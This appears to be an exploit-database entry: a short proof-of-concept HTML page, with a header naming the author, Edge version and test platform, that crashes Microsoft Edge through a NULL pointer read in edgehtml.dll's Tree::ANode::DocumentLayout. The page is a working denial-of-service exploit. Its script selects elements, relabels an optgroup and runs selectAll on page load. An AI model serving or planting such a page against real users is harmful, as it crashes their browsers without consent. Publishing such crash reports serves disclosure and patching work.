# Exploit Title: Microsoft Edge edgehtml.dll!Tree::ANode::DocumentLayout. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-11
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.microsoft.com/
# Version: Microsoft Edge 42.17134.1.0 (Microsoft EdgeHTML 17.17134)
# Tested on: Windows 10 x64
# CVE : N/A
# Description:
# Access violation while reading memory at 0x5C using a NULL pointer (microsoftedgecp.exe!edgehtml.dll!Tree::ANode::DocumentLayout)
# https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19594021/
PoC.html
<html>
<head>
<script>
function ff() {
var v4= document.elementFromPoint(0,0);
v2.label = "C";
var v3= document.execCommand("selectAll", true);
}
</script>
</head>
<body onload=ff()>
<select id="1" multiple="multiple">
<optgroup id="v2" label="A">
<option id="v1">
</body>
</html>